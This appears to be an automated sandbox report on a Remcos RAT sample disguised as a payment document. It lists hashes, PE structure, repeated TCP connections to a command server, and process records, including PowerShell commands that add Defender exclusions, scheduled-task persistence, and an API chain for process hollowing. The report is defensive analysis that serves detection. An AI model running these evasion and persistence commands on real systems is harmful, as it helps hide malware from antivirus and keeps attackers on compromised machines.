                            SHA-512:497ED36AC9B90248FAD67A8CEA828CD654C7876C0DB6C7FE08A2487D50E306FA35BC89AC71229086A59F730CF5726025FEC88EEDD373730E1329B995386591BE
                            Malicious:false
                            Preview:...[ Program Manager ]......{ User has been idle for 0 minutes }......{ User has been idle for 70179 minutes }......{ User has been idle for 68123 minutes }...

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.734947931218711
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:e-Payment.NET.CMS4006975815.exe
                            File size:771'584 bytes
                            MD5:b16699f8fd5e68de16d8904ec7cd3ed2
                            SHA1:45fac6b1832fad2fef90e1064ab4e78e0b164737
                            SHA256:d21d0451a7a8b112776118d88154bf7eab2703b13bf6ae1dcaec2f959bf42305
                            SHA512:65f6a8a1899caab9aa2f120f880736b92617e9ad0f8c033c0f7c194d3e0a51cd90ea98f5c63beb6be213689cad74af7630360e0c882b8a0bfc2d7040943b5297
                            SSDEEP:12288:ArwE8GILjWLWg7DTBCZrWvGYjS/9ofzvOW4J9gAlMTAq9Ys2D485eP4sSEAmD:tc7vB2AS/9c2WkgAwAq2s0N5e6
                            TLSH:02F4F161B20A8B99D51E0BF90CA54544037A5F1F3220D31E2ECD3AEBB1B3747A646D7B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..............0.................. ........@.. ....................... ............@................................

                            File Icon

                            Icon Hash:0fd88dc89ea7861b

                            Static PE Info

                            General

                            Entrypoint:0x4ad3a2
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66821938 [Mon Jul 1 02:49:28 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xad3500x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x10ca0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xab3a80xab400577bb28e10d16b3fff11359fa446c5c6False0.7950544593978102data7.914356657903147IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xae0000x10ca00x10e006a7f49bbdd3a3cd8bb010aba57da5883False0.1489872685185185data3.86611313725418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xc00000xc0x200a0972416a8e5d11832db831cdf2b1ffbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xae1180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m0.14468236129184905
                            RT_GROUP_ICON0xbe9400x14data1.0
                            RT_GROUP_ICON0xbe9540x14data1.05
                            RT_VERSION0xbe9680x338data0.4381067961165049

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 1, 2024 15:13:50.382031918 CEST497073319192.168.2.962.102.148.166
                            Jul 1, 2024 15:13:50.386948109 CEST33194970762.102.148.166192.168.2.9
                            Jul 1, 2024 15:13:50.387047052 CEST497073319192.168.2.962.102.148.166
                            Jul 1, 2024 15:13:50.387855053 CEST497073319192.168.2.962.102.148.166
                            Jul 1, 2024 15:13:50.393125057 CEST33194970762.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:11.778718948 CEST33194970762.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:11.778791904 CEST497073319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:16.790478945 CEST497103319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:16.795576096 CEST33194971062.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:16.795710087 CEST497103319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:16.795907021 CEST497103319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:16.800883055 CEST33194971062.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:38.170665979 CEST33194971062.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:38.170756102 CEST497103319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:43.180341005 CEST497123319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:43.186186075 CEST33194971262.102.148.166192.168.2.9
                            Jul 1, 2024 15:14:43.186258078 CEST497123319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:43.186525106 CEST497123319192.168.2.962.102.148.166
                            Jul 1, 2024 15:14:43.195847034 CEST33194971262.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:04.560786963 CEST33194971262.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:04.560926914 CEST497123319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:09.570872068 CEST497133319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:09.576488018 CEST33194971362.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:09.576589108 CEST497133319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:09.576785088 CEST497133319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:09.581931114 CEST33194971362.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:30.984157085 CEST33194971362.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:30.984342098 CEST497133319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:35.993005991 CEST497143319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:35.998097897 CEST33194971462.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:35.998229980 CEST497143319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:35.998409033 CEST497143319192.168.2.962.102.148.166
                            Jul 1, 2024 15:15:36.004019022 CEST33194971462.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:57.359966040 CEST33194971462.102.148.166192.168.2.9
                            Jul 1, 2024 15:15:57.360141039 CEST497143319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:02.368211031 CEST497153319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:02.373409033 CEST33194971562.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:02.373486042 CEST497153319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:02.373703003 CEST497153319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:02.378498077 CEST33194971562.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:23.734401941 CEST33194971562.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:23.734472990 CEST497153319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:28.743010044 CEST497163319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:28.747813940 CEST33194971662.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:28.747890949 CEST497163319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:28.748053074 CEST497163319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:28.753217936 CEST33194971662.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:50.126396894 CEST33194971662.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:50.126460075 CEST497163319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:55.136982918 CEST497173319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:55.142100096 CEST33194971762.102.148.166192.168.2.9
                            Jul 1, 2024 15:16:55.145195961 CEST497173319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:55.145423889 CEST497173319192.168.2.962.102.148.166
                            Jul 1, 2024 15:16:55.151570082 CEST33194971762.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:16.516890049 CEST33194971762.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:16.516972065 CEST497173319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:21.529078960 CEST497183319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:21.533915043 CEST33194971862.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:21.534082890 CEST497183319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:21.534445047 CEST497183319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:21.539361000 CEST33194971862.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:42.958195925 CEST33194971862.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:42.958261013 CEST497183319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:47.962523937 CEST497193319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:47.967439890 CEST33194971962.102.148.166192.168.2.9
                            Jul 1, 2024 15:17:47.967679024 CEST497193319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:47.967860937 CEST497193319192.168.2.962.102.148.166
                            Jul 1, 2024 15:17:47.972711086 CEST33194971962.102.148.166192.168.2.9

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:09:13:47
                            Start date:01/07/2024
                            Path:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0x40000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0x670000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
                            Imagebase:0x670000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
                            Imagebase:0x9f0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:09:13:48
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:09:13:49
                            Start date:01/07/2024
                            Path:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
                            Imagebase:0xe20000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:9
                            Start time:09:13:50
                            Start date:01/07/2024
                            Path:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Imagebase:0x4c0000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 42%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:10
                            Start time:09:13:50
                            Start date:01/07/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff72d8c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
                            Imagebase:0x9f0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:09:13:53
                            Start date:01/07/2024
                            Path:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
                            Imagebase:0x470000
                            File size:771'584 bytes
                            MD5 hash:B16699F8FD5E68DE16D8904EC7CD3ED2
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                            • Rule: Remcos, Description: detect Remcos in memory, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:12.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:184
                              Total number of Limit Nodes:9
                              execution_graph 19936 65d040 19937 65d086 GetCurrentProcess 19936->19937 19939 65d0d1 19937->19939 19940 65d0d8 GetCurrentThread 19937->19940 19939->19940 19941 65d115 GetCurrentProcess 19940->19941 19942 65d10e 19940->19942 19943 65d14b 19941->19943 19942->19941 19944 65d173 GetCurrentThreadId 19943->19944 19945 65d1a4 19944->19945 19967 65acb0 19968 65acbf 19967->19968 19971 65ad97 19967->19971 19979 65ada8 19967->19979 19972 65adb9 19971->19972 19973 65addc 19971->19973 19972->19973 19987 65b031 19972->19987 19991 65b040 19972->19991 19973->19968 19974 65add4 19974->19973 19975 65afe0 GetModuleHandleW 19974->19975 19976 65b00d 19975->19976 19976->19968 19980 65adb9 19979->19980 19981 65addc 19979->19981 19980->19981 19985 65b031 LoadLibraryExW 19980->19985 19986 65b040 LoadLibraryExW 19980->19986 19981->19968 19982 65add4 19982->19981 19983 65afe0 GetModuleHandleW 19982->19983 19984 65b00d 19983->19984 19984->19968 19985->19982 19986->19982 19988 65b054 19987->19988 19990 65b079 19988->19990 19995 65a130 19988->19995 19990->19974 19992 65b054 19991->19992 19993 65b079 19992->19993 19994 65a130 LoadLibraryExW 19992->19994 19993->19974 19994->19993 19996 65b220 LoadLibraryExW 19995->19996 19998 65b299 19996->19998 19998->19990 19999 65d690 DuplicateHandle 20000 65d726 19999->20000 20001 23c208a 20002 23c2090 20001->20002 20003 23c20ee 20001->20003 20003->20002 20006 23c4b90 20003->20006 20024 23c4b80 20003->20024 20007 23c4baa 20006->20007 20019 23c4bce 20007->20019 20042 23c53bd 20007->20042 20047 23c58e1 20007->20047 20052 23c5106 20007->20052 20057 23c5865 20007->20057 20061 23c5185 20007->20061 20069 23c580a 20007->20069 20074 23c5009 20007->20074 20079 23c560f 20007->20079 20083 23c54f2 20007->20083 20089 23c5036 20007->20089 20094 23c5555 20007->20094 20099 23c5794 20007->20099 20105 23c539b 20007->20105 20110 23c571b 20007->20110 20115 23c5978 20007->20115 20019->20002 20025 23c4baa 20024->20025 20026 23c53bd 2 API calls 20025->20026 20027 23c5978 2 API calls 20025->20027 20028 23c571b 2 API calls 20025->20028 20029 23c539b 2 API calls 20025->20029 20030 23c5794 2 API calls 20025->20030 20031 23c5555 2 API calls 20025->20031 20032 23c5036 2 API calls 20025->20032 20033 23c54f2 2 API calls 20025->20033 20034 23c560f 2 API calls 20025->20034 20035 23c5009 2 API calls 20025->20035 20036 23c580a 2 API calls 20025->20036 20037 23c4bce 20025->20037 20038 23c5185 4 API calls 20025->20038 20039 23c5865 2 API calls 20025->20039 20040 23c5106 2 API calls 20025->20040 20041 23c58e1 2 API calls 20025->20041 20026->20037 20027->20037 20028->20037 20029->20037 20030->20037 20031->20037 20032->20037 20033->20037 20034->20037 20035->20037 20036->20037 20037->20002 20038->20037 20039->20037 20040->20037 20041->20037 20043 23c53ca 20042->20043 20120 23c0efa 20043->20120 20124 23c0f00 20043->20124 20044 23c5a1f 20048 23c5864 20047->20048 20128 23c0fa8 20048->20128 20132 23c0fb0 20048->20132 20049 23c5882 20053 23c510c 20052->20053 20136 23c1668 20053->20136 20140 23c1670 20053->20140 20054 23c5132 20054->20019 20059 23c0fa8 Wow64SetThreadContext 20057->20059 20060 23c0fb0 Wow64SetThreadContext 20057->20060 20058 23c5882 20059->20058 20060->20058 20144 23c14b8 20061->20144 20148 23c14c0 20061->20148 20062 23c51a6 20064 23c4f6e 20062->20064 20152 23c1578 20062->20152 20156 23c1580 20062->20156 20063 23c5756 20063->20019 20064->20019 20070 23c5817 20069->20070 20072 23c0efa ResumeThread 20070->20072 20073 23c0f00 ResumeThread 20070->20073 20071 23c5a1f 20072->20071 20073->20071 20075 23c500c 20074->20075 20076 23c5073 20075->20076 20160 23c1bfd 20075->20160 20164 23c1c08 20075->20164 20076->20019 20081 23c1578 WriteProcessMemory 20079->20081 20082 23c1580 WriteProcessMemory 20079->20082 20080 23c5645 20081->20080 20082->20080 20084 23c5501 20083->20084 20086 23c4f6e 20084->20086 20087 23c1578 WriteProcessMemory 20084->20087 20088 23c1580 WriteProcessMemory 20084->20088 20085 23c557c 20086->20019 20087->20085 20088->20085 20090 23c503c 20089->20090 20092 23c1bfd CreateProcessA 20090->20092 20093 23c1c08 CreateProcessA 20090->20093 20091 23c5073 20091->20019 20092->20091 20093->20091 20095 23c556e 20094->20095 20097 23c1578 WriteProcessMemory 20095->20097 20098 23c1580 WriteProcessMemory 20095->20098 20096 23c557c 20097->20096 20098->20096 20100 23c5727 20099->20100 20101 23c5797 20099->20101 20103 23c1578 WriteProcessMemory 20100->20103 20104 23c1580 WriteProcessMemory 20100->20104 20102 23c5756 20102->20019 20103->20102 20104->20102 20106 23c58e3 20105->20106 20108 23c0fa8 Wow64SetThreadContext 20106->20108 20109 23c0fb0 Wow64SetThreadContext 20106->20109 20107 23c51d2 20107->20019 20108->20107 20109->20107 20111 23c5721 20110->20111 20113 23c1578 WriteProcessMemory 20111->20113 20114 23c1580 WriteProcessMemory 20111->20114 20112 23c5756 20112->20019 20113->20112 20114->20112 20116 23c59a1 20115->20116 20118 23c0efa ResumeThread 20116->20118 20119 23c0f00 ResumeThread 20116->20119 20117 23c5a1f 20118->20117 20119->20117 20121 23c0f40 ResumeThread 20120->20121 20123 23c0f71 20121->20123 20123->20044 20125 23c0f40 ResumeThread 20124->20125 20127 23c0f71 20125->20127 20127->20044 20129 23c0ff5 Wow64SetThreadContext 20128->20129 20131 23c103d 20129->20131 20131->20049 20133 23c0ff5 Wow64SetThreadContext 20132->20133 20135 23c103d 20133->20135 20135->20049 20137 23c16bb ReadProcessMemory 20136->20137 20139 23c16ff 20137->20139 20139->20054 20141 23c16bb ReadProcessMemory 20140->20141 20143 23c16ff 20141->20143 20143->20054 20145 23c1500 VirtualAllocEx 20144->20145 20147 23c153d 20145->20147 20147->20062 20149 23c1500 VirtualAllocEx 20148->20149 20151 23c153d 20149->20151 20151->20062 20153 23c15c8 WriteProcessMemory 20152->20153 20155 23c161f 20153->20155 20155->20063 20157 23c15c8 WriteProcessMemory 20156->20157 20159 23c161f 20157->20159 20159->20063 20161 23c1c91 CreateProcessA 20160->20161 20163 23c1e53 